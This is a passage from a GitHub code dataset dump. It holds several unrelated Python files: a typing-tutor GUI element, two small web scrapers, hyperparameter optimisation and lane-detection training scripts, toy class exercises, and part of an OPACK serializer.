self.number_of_bars_to_display = int(speed_bar_length)\n\n def set_accuracy(self, accuracy):\n\n \"\"\"Display the accuracy the user is typing with as fraction correct.\n Accuracy is displayed in the colour of the speed bar, and as a text\n label.\n\n @param accuracy: number words correct/total number of words\n @type accuracy: float\n \"\"\"\n \n # Arbitrary choice of brightness\n color_brightness = 0.4\n\n max_eight_bit_brightness = 255\n accuracy_color = max_eight_bit_brightness*accuracy\n self.speed_bar_underlay.append_text(\"accuracy: %s\" \n % int(round((accuracy * 100), 2)))\n\n red = int((max_eight_bit_brightness-accuracy_color)*color_brightness)\n green = int(accuracy_color*color_brightness)\n blue = 0\n\n speed_bar_color = (red, green, blue)\n for speed_bar_block in self.speed_blocks:\n speed_bar_block.set_color(speed_bar_color)\n \n def draw(self, surface):\n\n \"\"\"Draw speed bar on screen.\"\"\"\n\n if self.display_bar:\n self.speed_bar_underlay.blit_on(surface)\n\n for i in range(self.number_of_bars_to_display):\n self.speed_blocks[i].blit_on(surface)\n\n\n","repo_name":"openstenotype/steno-tutor","sub_path":"gui/elements/speedbar.py","file_name":"speedbar.py","file_ext":"py","file_size_in_byte":3920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"73548380897","text":"import json\nfrom lxml import etree\nimport requests\n\nheaders = {\n 'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36',\n}\n\nresponse = requests.get('https://www.zhihu.com/api/v4/members/excited-vczh/followees?include=data%5B%2A%5D.answer_count%2Carticles_count%2Cgender%2Cfollower_count%2Cis_followed%2Cis_following%2Cbadge%5B%3F%28type%3Dbest_answerer%29%5D.topics&limit=20&offset=20',headers=headers)\ndata = json.loads(response.text)\nusers = data.get('data')\nprint(users)\nif response.status_code == 200:\n print('111')\n data = json.loads(response.text)\n print(type(data))\n next_url = data.get('paging').get('next')\n print(next_url)\n print(type(next_url))\n print('222')\n #得到用户数组\n users = data.get('data')\n #每组用户信息由一个字典组成\n for user in users:\n user_url = user.get('url_token')\n print(user_url)\n print(type(user_url))\n","repo_name":"yuebanwanwan/zhihustar","sub_path":"zhihustar/spiders/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"2869638866","text":"class Customer:\r\n def __init__(self, email: str, name: str, tax: int = 2):\r\n self.email = email\r\n self.name = name\r\n self.tax = tax\r\n\r\n def total_amount(self, price_of_flat: float):\r\n return round(self.tax / 100 * price_of_flat + price_of_flat)\r\n\r\n\r\nclass LoyalCustomer(Customer):\r\n def __init__(self, email: str, name: str, tax: int = 1):\r\n super().__init__(email, name, tax)\r\n\r\n\r\nclass Flat:\r\n def __init__(self, flat_price: float, flat_address: str):\r\n self.flat_price = flat_price\r\n self.flat_address = flat_address\r\n\r\n\r\nclass RealEstateCompany:\r\n def __init__(self, client_list: list[Customer | LoyalCustomer], flat_list: list[Flat]):\r\n self.client_list = client_list\r\n self.flat_list = flat_list\r\n\r\n def cheapest(self):\r\n if len(self.flat_list) > 0:\r\n cheapest_flat = self.flat_list[0]\r\n for flat in self.flat_list:\r\n if flat.flat_price < cheapest_flat.flat_price:\r\n cheapest_flat = flat\r\n return cheapest_flat\r\n else:\r\n return print(\"No flats\")\r\n\r\n def sell(self, flat: list[Flat], client: list[Customer]):\r\n if flat in self.flat_list and client in self.client_list:\r\n print(f\"Flat address: {flat.flat_address}, \"\r\n f\"Customer email: {client.email}, \"\r\n f\"Name: {client.name}\"\r\n f\"Total payed: {client.total_amount}\")\r\n self.flat_list.remove(flat)\r\n else:\r\n print(\"Client or Flat not found\")\r\n","repo_name":"Psyhex/Task-Real-estate-company","sub_path":"classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"30304739132","text":"filmList = [{\"Name\": \"Inception\", \"Year\": 2010, \"Rating\": 8.7},\n {\"Name\": \"Inside Out\", \"Year\": 2015, \"Rating\": 8.1},\n {\"Name\": \"Con Air\", \"Year\": 1997, \"Rating\": 6.9}]\n\ndef filmListFil(list,filNavn):\n with open(filNavn, \"w\") as fineList:\n for film in list:\n fineList.write(\"{} - {} has a rating of {} \\n\".format(film.get(\"Name\"), film.get(\"Year\"), film.get(\"Rating\")))\n\nfilmListFil(filmList, \"film.txt\")\n\ndef FilmListLes(filNavn):\n with open(filNavn, \"r\") as lesList:\n print(lesList.read())\n\nFilmListLes(\"film.txt\")","repo_name":"mentos1337/Sandbox","sub_path":"oblig3_Granit-Salihu/programmeringsoppgave5,3.py","file_name":"programmeringsoppgave5,3.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"311344082","text":"# import of the required libraries\nimport numpy as np\nimport timeit\n\n\nfrom pyGPGO.covfunc import squaredExponential\nfrom pyGPGO.surrogates.GaussianProcess import GaussianProcess\nfrom pyGPGO.surrogates.RandomForest import RandomForest\nfrom pyGPGO.GPGO import GPGO\nfrom pyGPGO.acquisition import Acquisition\nfrom pyGPGO.covfunc import matern32\n\nfrom sklearn import datasets\nfrom sklearn import svm\nfrom sklearn.model_selection import cross_val_score\n\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D \nfrom pylab import meshgrid,cm,imshow,contour,clabel,colorbar,axis,title,show\n\n\n#Import Load Wine Dataset\nds = datasets.load_wine()\nprint(\"Dataframe Data Shape: \",ds.data.shape)\nprint(\"Dataframe Target Shape: \", ds.target.shape)\n\ndef compute_accuracy_SVC(C,gamma,coef0):\n clf = svm.SVC(C=C,gamma=gamma,coef0=coef0)\n scores = cross_val_score(clf, ds.data, ds.target, cv=10)\n return (scores.mean())\n\nnp.random.seed(42)\ninitialPoints = 30\nfurtherEvaluations = 120\n\n# defining a dictionary on \"x\"\nparam = { 'C': ('cont', [0.1,5]),\n 'gamma': ('cont', [0.1,10]),\n 'coef0':('cont',[0.1,10])\n } \n\n# creating a GP surrogate model with a Squared Exponantial covariance function,\n# aka kernel\nsexp = squaredExponential()\nsur_model_1 = GaussianProcess(sexp)\nsur_model_2 = RandomForest()\n\n# setting the acquisition function\nacq_1 = Acquisition(mode=\"ExpectedImprovement\")\nacq_2 = Acquisition(mode=\"ProbabilityImprovement\")\nacq_3 = Acquisition(mode=\"UCB\")\n\n# creating an object Bayesian Optimization\ngpgo_gaussian_model_1 = GPGO(sur_model_1,acq_1,compute_accuracy_SVC,param)\ngpgo_gaussian_model_2 = GPGO(sur_model_1,acq_2,compute_accuracy_SVC,param)\ngpgo_gaussian_model_3 = GPGO(sur_model_1,acq_3,compute_accuracy_SVC,param)\n\ngpgo_random_forest_1 = GPGO(sur_model_2,acq_1,compute_accuracy_SVC,param)\ngpgo_random_forest_2 = GPGO(sur_model_2,acq_2,compute_accuracy_SVC,param)\ngpgo_random_forest_3 = GPGO(sur_model_2,acq_3,compute_accuracy_SVC,param)\n\n#Run models\ngaussianModel_1_start = timeit.default_timer()\ngpgo_gaussian_model_1.run(max_iter=furtherEvaluations,init_evals=initialPoints)\ngaussianModel_1_stop = timeit.default_timer()\n\ngaussianModel_2_start = timeit.default_timer()\ngpgo_gaussian_model_2.run(max_iter=furtherEvaluations,init_evals=initialPoints)\ngaussianModel_2_stop = timeit.default_timer()\n\ngaussianModel_3_start = timeit.default_timer()\ngpgo_gaussian_model_3.run(max_iter=furtherEvaluations,init_evals=initialPoints)\ngaussianModel_3_stop = timeit.default_timer()\n\nrandomForest_1_start = timeit.default_timer()\ngpgo_random_forest_1.run(max_iter=furtherEvaluations,init_evals=initialPoints)\nrandomForest_1_stop = timeit.default_timer()\n\nrandomForest_2_start = timeit.default_timer()\ngpgo_random_forest_2.run(max_iter=furtherEvaluations,init_evals=initialPoints)\nrandomForest_2_stop = timeit.default_timer()\n\nrandomForest_3_start = timeit.default_timer()\ngpgo_random_forest_3.run(max_iter=furtherEvaluations,init_evals=initialPoints)\nrandomForest_3_stop = timeit.default_timer()\n\n#Get the results\nprint(\"\\n---Results---\\n\")\nprint(\"\\n\", gpgo_gaussian_model_1.getResult())\nprint('Gaussian Model 1 Time: ', gaussianModel_1_start - gaussianModel_1_stop) \nprint(\"\\n\", gpgo_gaussian_model_2.getResult())\nprint('Gaussian Model 2 Time: ', gaussianModel_2_start - gaussianModel_2_stop) \nprint(\"\\n\", gpgo_gaussian_model_3.getResult())\nprint('Gaussian Model 3 Time: ', gaussianModel_3_start - gaussianModel_3_start) \n\nprint(\"\\n\", gpgo_random_forest_1.getResult())\nprint('Random Forest 1 Time: ', randomForest_1_start - randomForest_1_stop) \nprint(\"\\n\", gpgo_random_forest_2.getResult())\nprint('Random Forest 2 Time: ', randomForest_2_start - randomForest_2_stop) \nprint(\"\\n\",gpgo_random_forest_3.getResult())\nprint('Random Forest 3 Time: ', randomForest_3_start - randomForest_3_stop) \n\n\n#------------------------------\n#GRID SEARCH\nxrange = list(param.values())[0][1]\nyrange = list(param.values())[1][1]\nzrange = list(param.values())[2][1]\n\n\nC_values = np.linspace(xrange[0],xrange[1],5)\ngamma_values = np.linspace(yrange[0],yrange[1],6)\ndef0 = np.linspace(zrange[0],zrange[1],5)\n\nres = [0 for n in range(150)]\ncount = 0\ngrid_search_start = timeit.default_timer()\nfor cc in C_values:\n for gg in gamma_values:\n for dd in def0:\n res[count] = compute_accuracy_SVC( cc, gg, dd )\n count = count+1\n\ngrid_search_stop = timeit.default_timer()\n\nprint(\"\\nGrid Search, Best on Grid:\"+str(round(max(np.asarray(res)),2))+\"%%\")\nprint('Grid Search Time: ', grid_search_start - grid_search_stop) \n \n\n\nprint(\"\\n\\n---Finish---\")","repo_name":"JeyDi/BayesianMLOptimization","sub_path":"experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":4620,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"20057727554","text":"# encoding:utf-8\nimport re\nimport os\nimport json\nimport time\nimport aiohttp\nimport asyncio\nfrom lxml import etree\n\nclass Crawler:\n\n def __init__(self, urls, max_workers=8):\n self.urls = urls\n self.folder = ''\n self.fetching = asyncio.Queue()\n self.max_workers = max_workers\n self.headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.119 Safari/537.36',\n 'Referer': 'https://www.sandpay.com.cn/shop/merchantList.html',\n 'Host': 'www.sandpay.com.cn',\n }\n async def crawl(self):\n # DON'T await here; start consuming things out of the queue, and\n # meanwhile execution of this function continues. We'll start two\n # coroutines for fetching and two coroutines for processing.\n all_the_coros = asyncio.gather(\n *[self._worker(i) for i in range(self.max_workers)])\n\n # place all URLs on the queue\n for url in self.urls:\n await self.fetching.put(url)\n\n # now put a bunch of `None`'s in the queue as signals to the workers\n # that there are no more items in the queue.\n for _ in range(self.max_workers):\n await self.fetching.put(None)\n\n # now make sure everything is done\n await all_the_coros\n\n async def _worker(self, i):\n while True:\n url = await self.fetching.get()\n if url is None:\n # this coroutine is done; simply return to exit\n return\n\n # print(f'Fetch worker {i} is fetching a URL: {url}')\n async with aiohttp.ClientSession() as session:\n await self.SaveData(session, url)\n\n async def SaveData(self, session, url):\n # print(type(data))\n tmp = url.split('?')\n url = tmp[0]\n pageNo = tmp[-1:][0]\n data = {\n 'province':'901',\n 'district' : '',\n 'district2' : '',\n 'shopTypes' : '',\n 'payTypes' : '',\n 'cardNumFive': '',\n 'shortName' : '',\n 'address': '',\n 'isSupportYj': '',\n 'shopMemo' : '1',\n 'pageNo': pageNo,\n }\n file = self.folder + pageNo.zfill(5)+ '.json'\n isFileExists = os.path.exists(file)\n if not isFileExists:\n async with session.post(url, headers=self.headers, data=data, timeout=5, verify_ssl=False) as response:\n print('save to .json file, page is: ' + pageNo)\n try:\n response = await response.json()\n with open(file, 'w') as f:\n f.write(json.dumps(response))\n\n except Exception as e:\n with open('error.log', 'w') as f:\n f.write('error page is' + pageNo)\n return\n\n\ndef test():\n import requests\n # 关闭https证书验证警告\n requests.packages.urllib3.disable_warnings()\n\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.119 Safari/537.36',\n 'Referer': 'https://www.sandpay.com.cn/shop/merchantList.html',\n 'Host': 'www.sandpay.com.cn',\n }\n url = 'https://www.sandpay.com.cn/shop/getMerchantPage'\n # 1. 导入Python SSL处理模块\n # import ssl\n # 2. 表示忽略未经核实的SSL证书认证\n # Econtext = ssl._create_unverified_context()\n\n data ={\n 'province':'901', # 上海市\n #'province':'902', # 江苏省\n #'province':'903', # 浙江省\n #'province':'904', # 北京市\n 'district' : '',\n 'district2' : '',\n 'shopTypes' : '',\n 'payTypes' : '',\n 'cardNumFive': '',\n 'shortName' : '',\n 'address': '',\n 'isSupportYj': '',\n 'shopMemo' : '1',\n 'pageNo': '1',\n }\n r = requests.post(url, headers=headers, data=data,verify=False)\n\n if r.status_code == 200: # ok\n jsonp = r.json()\n pageCount = jsonp['pageCount']\n\n urlList = [url+'?'+str(e) for e in range(1, int(pageCount)+1)]\n # print(urlList)\n print('All urlPage is: ', len(urlList))\n c = Crawler(urlList)\n c.folder = './data/'\n isExists = os.path.exists(c.folder)\n if not isExists:\n os.makedirs(c.folder)\n asyncio.run(c.crawl())\n print('OK')\n\n\nif __name__=='__main__':\n start = time.time()\n test()\n end = time.time()\n print(\"Finished in Time Consuming: {}\".format(end-start))\n","repo_name":"TopShares/Python","sub_path":"Spider/sandpay.com.cn/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4573,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"31813767298","text":"# we have string - result must be the first and the last 2 character of the string\n\nname = \"My Name is Sahil Nagpal and I love Programming\"\n\nfirst2index = name[:2]\nlast2index = name[len(name)-2:len(name)]\nprint(first2index + last2index)\n#print(last2index)\n\n#string.replace(old, new, count)\nprint(name.replace('e','r',2))\n\n\n# question - find the longest word and print the word and length of the z\n# question - remove the nth index element from the string\n\n\n\n\n\n\n\n\n","repo_name":"Swaraajain/learnPython","sub_path":"learn.python.loops/stringQuestions.py","file_name":"stringQuestions.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"72666488096","text":"import numpy as np\nimport helper\nimport random\n\n# This class has all the functions and variables necessary to implement snake game\n# We will be using Q learning to do this\n# Credits to Chitian Hao for the help!\nclass SnakeAgent:\n\n # This is the constructor for the SnakeAgent class\n # It initializes the actions that can be made,\n # Ne which is a parameter helpful to perform exploration before deciding next action,\n # LPC which ia parameter helpful in calculating learning rate (lr) \n # gamma which is another parameter helpful in calculating next move, in other words \n # gamma is used to blalance immediate and future reward\n # Q is the q-table used in Q-learning\n # N is the next state used to explore possible moves and decide the best one before updating\n # the q-table\n def __init__(self, actions, Ne, LPC, gamma):\n self.actions = actions\n self.Ne = Ne\n self.LPC = LPC\n self.gamma = gamma\n self.reset()\n\n # Create the Q and N Table to work with\n self.Q = helper.initialize_q_as_zeros()\n self.N = helper.initialize_q_as_zeros()\n\n\n # This function sets if the program is in training mode or testing mode.\n def set_train(self):\n self._train = True\n\n # This function sets if the program is in training mode or testing mode. \n def set_eval(self):\n self._train = False\n\n # Calls the helper function to save the q-table after training\n def save_model(self):\n helper.save(self.Q)\n\n # Calls the helper function to load the q-table when testing\n def load_model(self):\n self.Q = helper.load()\n\n # resets the game state\n def reset(self):\n self.points = 0\n self.s = None\n self.a = None\n \n # Function Helper:It gets the current state, and based on the \n # current snake head location, body and food location,\n # determines which move(s) it can make by also using the \n # board variables to see if its near a wall or if the\n # moves it can make lead it into the snake body and so on. \n # Returns a list of variables that help you keep track of\n # conditions mentioned above.\n def helper_func(self, state):\n print(\"IN helper_func\")\n head = [state[0],state[1]]\n head_x = head[0]\n head_y = head[1]\n body = state[2]\n food = [state[3], state[4]]\n food_x = food[0]\n food_y = food[1]\n body_list = []\n for i, j in body: body_list.append([i,j])\n wall_hit = [0,0]\n direction_of_food = [0,0]\n snake_body = []\n\n if head_x == 40: wall_hit[0] = 1\n elif head_x == 480: wall_hit[0] = 2\n else: wall_hit[0] = 0\n if head_y == 40: wall_hit[1] = 1\n elif head_y == 480: wall_hit[1] = 2\n else: wall_hit[1] = 0\n\n if (food_x - head_x) > 0: direction_of_food[0] = 2\n elif (food_x - head_x) < 0: direction_of_food[0] = 1\n else: direction_of_food[0] = 0\n if (food_y - head_y) > 0: direction_of_food[1] = 2\n elif (food_y - head_y) < 0: direction_of_food[1] = 1\n else: direction_of_food[1] = 0\n\n if [head_x, head_y-1] in body_list: collision = 1 \n else: collision = 0\n snake_body.append(collision)\n if [head_x, head_y+1] in body_list: collision = 1 \n else: collision = 0\n snake_body.append(collision)\n if [head_x-1, head_y] in body_list: collision = 1\n else: collision = 0\n snake_body.append(collision)\n if ((head_x+1, head_y) in body_list): collision = 1\n else: collision = 0\n snake_body.append(collision)\n condition_list = [wall_hit[0],wall_hit[1],direction_of_food[0],direction_of_food[1],snake_body[0],snake_body[1],snake_body[2],snake_body[3]]\n return condition_list\n\n # Computing the reward.\n def compute_reward(self, points, dead):\n if dead:\n return -1\n elif points > self.points:\n return 1\n else:\n return -0.1\n\n\n def agent_action(self, state, points, dead):\n print(\"IN AGENT_ACTION\")\n\n def change(state,dead,points,previous_state,previous_action):\n previous_move = self.helper_func(previous_state)\n r = self.compute_reward(points, dead)\n present_state = self.helper_func(state)\n upper = self.Q[present_state[0]][present_state[1]][present_state[2]][present_state[3]][present_state[4]][present_state[5]][present_state[6]][present_state[7]][0]\n bottom = self.Q[present_state[0]][present_state[1]][present_state[2]][present_state[3]][present_state[4]][present_state[5]][present_state[6]][present_state[7]][1]\n left = self.Q[present_state[0]][present_state[1]][present_state[2]][present_state[3]][present_state[4]][present_state[5]][present_state[6]][present_state[7]][2]\n right = self.Q[present_state[0]][present_state[1]][present_state[2]][present_state[3]][present_state[4]][present_state[5]][present_state[6]][present_state[7]][3]\n action = max(upper, bottom, left, right)\n q = self.Q[previous_move[0]][previous_move[1]][previous_move[2]][previous_move[3]][previous_move[4]][previous_move[5]][previous_move[6]][previous_move[7]][previous_action]\n alpha = self.LPC / (self.LPC + self.N[previous_move[0]][previous_move[1]][previous_move[2]][previous_move[3]]\n [previous_move[4]][previous_move[5]][previous_move[6]][previous_move[7]][previous_action])\n change = q + alpha * (r + self.gamma * action - q)\n return change\n Qvalues = [0, 0, 0, 0]\n if dead:\n previous_state = self.helper_func(self.s)\n self.Q[previous_state[0]][previous_state[1]][previous_state[2]][previous_state[3]][previous_state[4]][previous_state[5]][previous_state[6]][previous_state[7]][self.a] = change(state, dead, points, self.s, self.a)\n self.reset()\n return\n present_state = self.helper_func(state)\n if self._train and self.s != None and self.a != None:\n previous_state = self.helper_func(self.s)\n new_q = change(state, dead, points, self.s, self.a)\n self.Q[previous_state[0]][previous_state[1]][previous_state[2]][previous_state[3]][previous_state[4]][previous_state[5]][previous_state[6]][previous_state[7]][self.a] = new_q\n for i in range(helper.NUM_ACTIONS):\n n = self.N[present_state[0]][present_state[1]][present_state[2]][present_state[3]][present_state[4]][present_state[5]][present_state[6]][present_state[7]][i]\n q = self.Q[present_state[0]][present_state[1]][present_state[2]][present_state[3]][present_state[4]][present_state[5]][present_state[6]][present_state[7]][i]\n if n < self.Ne:\n Qvalues[i] = 1\n else:\n Qvalues[i] = q\n action = np.argmax(Qvalues)\n max_action = max(Qvalues)\n for i in range(len(Qvalues)-1, -1, -1):\n if Qvalues[i] == max_action:\n action = i\n break\n self.N[present_state[0]][present_state[1]][present_state[2]][present_state[3]][present_state[4]][present_state[5]][present_state[6]][present_state[7]][action] += 1\n self.s = state\n self.a = action\n self.points = points\n return action","repo_name":"Nandhaaramakrishnan/UCSC-CSE240","sub_path":"Assignment_5/snake_agent.py","file_name":"snake_agent.py","file_ext":"py","file_size_in_byte":7411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"23215375986","text":"import matplotlib.pyplot as plt\n\n\n\n\nmatriz = []\nletrasdospontos = []\nquantpontos = 0\ncaminhos = []\ndronometros = []\nnew = []\n\nwith open('matriz.txt') as f:\n while True:\n linhas,colunas=f.readline().split()\n lines=f.read().splitlines()\n break\n \n \nquantcaminhos = 0\nlinhas=int(linhas)\ncolunas=int(colunas)\n\nfor l in range (linhas):\n a = []\n for k in range (len(lines[0])):\n if lines[l][k]!=' ':\n ponto = lines[l][k]\n a.append(ponto)\n if not (ponto=='R' or ponto=='0'):\n letrasdospontos.append (ponto)\n quantpontos +=1\n\n matriz.append (a)\n\n\ndef permutacao_gerador (lista):\n if len(lista)<=1:\n yield lista\n return\n for i, atual in enumerate(lista):\n elementos_restantes = lista[:i]+lista[i+1:]\n for p in permutacao_gerador (elementos_restantes):\n yield [atual]+p\n\n\n\nfor i, p in enumerate(permutacao_gerador(letrasdospontos)):\n caminhos.append (p)\n print (p)\n \n\n\nfor z in range(len(caminhos)):\n for v in range (quantpontos+1):\n if v==0:\n distt=0\n for x in range(linhas):\n for y in range(colunas):\n if matriz[x][y]=='R':\n for t in range(linhas):\n for u in range(colunas):\n if matriz[t][u]==caminhos[z][v]:\n distX = u-y\n if u-y<0:\n distX=y-u\n distY=t-x\n if t-x<0:\n distY=x-t\n distt=distY+distX\n if (v>0 and v 100:\n iter_times = iter_times[-ITER_TIME_WINDOW:]\n if (i + 1) % ITER_LOG_INTERVAL == 0:\n loss_str = ', '.join(\n ['{}: {:.4f}'.format(loss_name, loss_dict_i[loss_name]) for loss_name in loss_dict_i])\n logging.info(\"Epoch [{}/{}], Step [{}/{}], Loss: {:.4f} ({}), s/iter: {:.4f}, lr: {:.1e}\".format(\n epoch,\n num_epochs,\n i + 1,\n total_step,\n accum_loss / (i + 1),\n loss_str,\n np.mean(iter_times),\n optimizer.param_groups[0][\"lr\"],\n ))\n logging.info(\"Epoch time: {:.4f}\".format(time() - epoch_t0))\n if epoch % MODEL_SAVE_INTERVAL == 0 or epoch == num_epochs:\n model_path = os.path.join(exp_dir, \"models\", \"model_{:03d}.pt\".format(epoch))\n save_train_state(model_path, model, optimizer, scheduler, epoch)\n if val_loader is not None:\n evaluator = Evaluator(val_loader.dataset, exp_root)\n evaluator, val_loss = test(\n model,\n val_loader,\n evaluator,\n None,\n cfg,\n view=False,\n epoch=-1,\n verbose=False,\n )\n _, results = evaluator.eval(label=None, only_metrics=True)\n logging.info(\"Epoch [{}/{}], Val loss: {:.4f}\".format(epoch, num_epochs, val_loss))\n model.train()\n scheduler.step()\n logging.info(\"Training time: {:.4f}\".format(time() - t0))\n\n return model\n\n\ndef save_train_state(path, model, optimizer, lr_scheduler, epoch):\n train_state = {\n 'model': model.state_dict(),\n 'optimizer': optimizer.state_dict(),\n 'lr_scheduler': lr_scheduler.state_dict(),\n 'epoch': epoch\n }\n\n torch.save(train_state, path)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description=\"Train PolyLaneNet\")\n parser.add_argument(\"--exp_name\", default=\"default\", help=\"Experiment name\", required=True)\n parser.add_argument(\"--cfg\", default=\"config.yaml\", help=\"Config file\", required=True)\n parser.add_argument(\"--resume\", action=\"store_true\", help=\"Resume training\")\n parser.add_argument(\"--validate\", action=\"store_true\", help=\"Validate model during training\")\n parser.add_argument(\"--deterministic\",\n action=\"store_true\",\n help=\"set cudnn.deterministic = True and cudnn.benchmark = False\")\n\n return parser.parse_args()\n\n\ndef get_code_state():\n state = \"Git hash: {}\".format(\n subprocess.run(['git', 'rev-parse', 'HEAD'], stdout=subprocess.PIPE).stdout.decode('utf-8'))\n state += '\\n*************\\nGit diff:\\n*************\\n'\n state += subprocess.run(['git', 'diff'], stdout=subprocess.PIPE).stdout.decode('utf-8')\n\n return state\n\n\ndef setup_exp_dir(exps_dir, exp_name, cfg_path):\n dirs = [\"models\"]\n exp_root = os.path.join(exps_dir, exp_name)\n\n for dirname in dirs:\n os.makedirs(os.path.join(exp_root, dirname), exist_ok=True)\n\n shutil.copyfile(cfg_path, os.path.join(exp_root, 'config.yaml'))\n with open(os.path.join(exp_root, 'code_state.txt'), 'w') as file:\n file.write(get_code_state())\n\n return exp_root\n\n\ndef get_exp_train_state(exp_root):\n models_dir = os.path.join(exp_root, \"models\")\n models = os.listdir(models_dir)\n last_epoch, last_modelname = sorted(\n [(int(name.split(\"_\")[1].split(\".\")[0]), name) for name in models],\n key=lambda x: x[0],\n )[-1]\n train_state = torch.load(os.path.join(models_dir, last_modelname))\n\n return train_state\n\n\ndef log_on_exception(exc_type, exc_value, exc_traceback):\n logging.error(\"Uncaught exception\", exc_info=(exc_type, exc_value, exc_traceback))\n\n\nif __name__ == \"__main__\":\n args = parse_args()\n cfg = Config(args.cfg)\n\n # Set up seeds\n torch.manual_seed(cfg['seed'])\n np.random.seed(cfg['seed'])\n random.seed(cfg['seed'])\n\n if args.deterministic:\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n\n # Set up experiment\n if not args.resume:\n exp_root = setup_exp_dir(cfg['exps_dir'], args.exp_name, args.cfg)\n else:\n exp_root = os.path.join(cfg['exps_dir'], os.path.basename(os.path.normpath(args.exp_name)))\n\n logging.basicConfig(\n format=\"[%(asctime)s] [%(levelname)s] %(message)s\",\n level=logging.INFO,\n handlers=[\n logging.FileHandler(os.path.join(exp_root, \"log.txt\")),\n logging.StreamHandler(),\n ],\n )\n\n sys.excepthook = log_on_exception\n\n logging.info(\"Experiment name: {}\".format(args.exp_name))\n logging.info(\"Config:\\n\" + str(cfg))\n logging.info(\"Args:\\n\" + str(args))\n\n # Get data sets\n train_dataset = cfg.get_dataset(\"train\")\n\n # Device configuration\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n # Hyper parameters\n num_epochs = cfg[\"epochs\"]\n batch_size = cfg[\"batch_size\"]\n\n # Model\n model = cfg.get_model().to(device)\n\n train_state = None\n if args.resume:\n train_state = get_exp_train_state(exp_root)\n\n # Data loader\n train_loader = torch.utils.data.DataLoader(dataset=train_dataset,\n batch_size=batch_size,\n shuffle=True,\n num_workers=8)\n\n if args.validate:\n val_dataset = cfg.get_dataset(\"val\")\n val_loader = torch.utils.data.DataLoader(dataset=val_dataset,\n batch_size=batch_size,\n shuffle=False,\n num_workers=8)\n # Train regressor\n try:\n model = train(\n model,\n train_loader,\n exp_root,\n cfg,\n val_loader=val_loader if args.validate else None,\n train_state=train_state,\n )\n except KeyboardInterrupt:\n logging.info(\"Training session terminated.\")\n test_epoch = -1\n if cfg['backup'] is not None:\n subprocess.run(['rclone', 'copy', exp_root, '{}/{}'.format(cfg['backup'], args.exp_name)])\n\n # Eval model after training\n test_dataset = cfg.get_dataset(\"test\")\n\n test_loader = torch.utils.data.DataLoader(dataset=test_dataset,\n batch_size=batch_size,\n shuffle=False,\n num_workers=8)\n\n evaluator = Evaluator(test_loader.dataset, exp_root)\n\n logging.basicConfig(\n format=\"[%(asctime)s] [%(levelname)s] %(message)s\",\n level=logging.INFO,\n handlers=[\n logging.FileHandler(os.path.join(exp_root, \"test_log.txt\")),\n logging.StreamHandler(),\n ],\n )\n logging.info('Code state:\\n {}'.format(get_code_state()))\n _, mean_loss = test(model, test_loader, evaluator, exp_root, cfg, epoch=test_epoch, view=False)\n logging.info(\"Mean test loss: {:.4f}\".format(mean_loss))\n\n evaluator.exp_name = args.exp_name\n\n eval_str, _ = evaluator.eval(label='{}_{}'.format(os.path.basename(args.exp_name), test_epoch))\n\n logging.info(eval_str)\n","repo_name":"lucastabelini/PolyLaneNet","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":9332,"program_lang":"python","lang":"en","doc_type":"code","stars":276,"dataset":"github-code","pt":"34"} +{"seq_id":"31328510004","text":"import copy\nimport datetime\nimport struct\nfrom enum import Enum, auto\nfrom typing import Tuple\n\nfrom opack.exceptions import BytesTooLargeError, IntegerOutOfBoundsError, InvalidTypeError\n\n\nclass TerminatorObject:\n \"\"\"Used to imitate the \\x03 terminator in the construct struct\"\"\"\n pass\n\n\ndef _get_bool_object_type(obj) -> int:\n if obj:\n return 1\n return 2\n\n\ndef _get_set_object_type(obj) -> int:\n return 3\n\n\ndef _get_datetime_object_time(obj) -> int:\n return 6\n\n\ndef _get_int_object_type(obj) -> int:\n if obj < 0:\n return _get_float_object_type(obj)\n elif obj <= 0x27:\n return obj + 8\n elif obj.bit_length() <= 8:\n return 0x30\n elif obj.bit_length() <= 32:\n return 0x32\n elif obj.bit_length() <= 64:\n return 0x33\n raise IntegerOutOfBoundsError(f'{obj} is too big for uint64_t')\n\n\ndef _get_float_object_type(obj) -> int:\n if struct.unpack('f', struct.pack('f', obj))[0] == obj: # check if the number fits in a c float\n return 0x35\n else:\n return 0x36\n\n\ndef _get_str_object_type(obj) -> int:\n obj_len = len(obj.encode())\n if obj_len <= 0x20:\n return 0x40 + obj_len\n elif obj_len <= 0xFF:\n return 0x61\n elif obj_len <= 0xFFFF:\n return 0x62\n elif obj_len < 2 ** 32:\n return 0x63\n return 0x64\n\n\ndef _get_bytes_object_type(obj) -> int:\n obj_len = len(obj)\n if obj_len <= 0x20:\n return 0x70 + obj_len\n elif obj_len <= 0xFF:\n return 0x91\n elif obj_len <= 0xFFFF:\n return 0x92\n elif obj_len < 2 ** 32:\n return 0x93\n 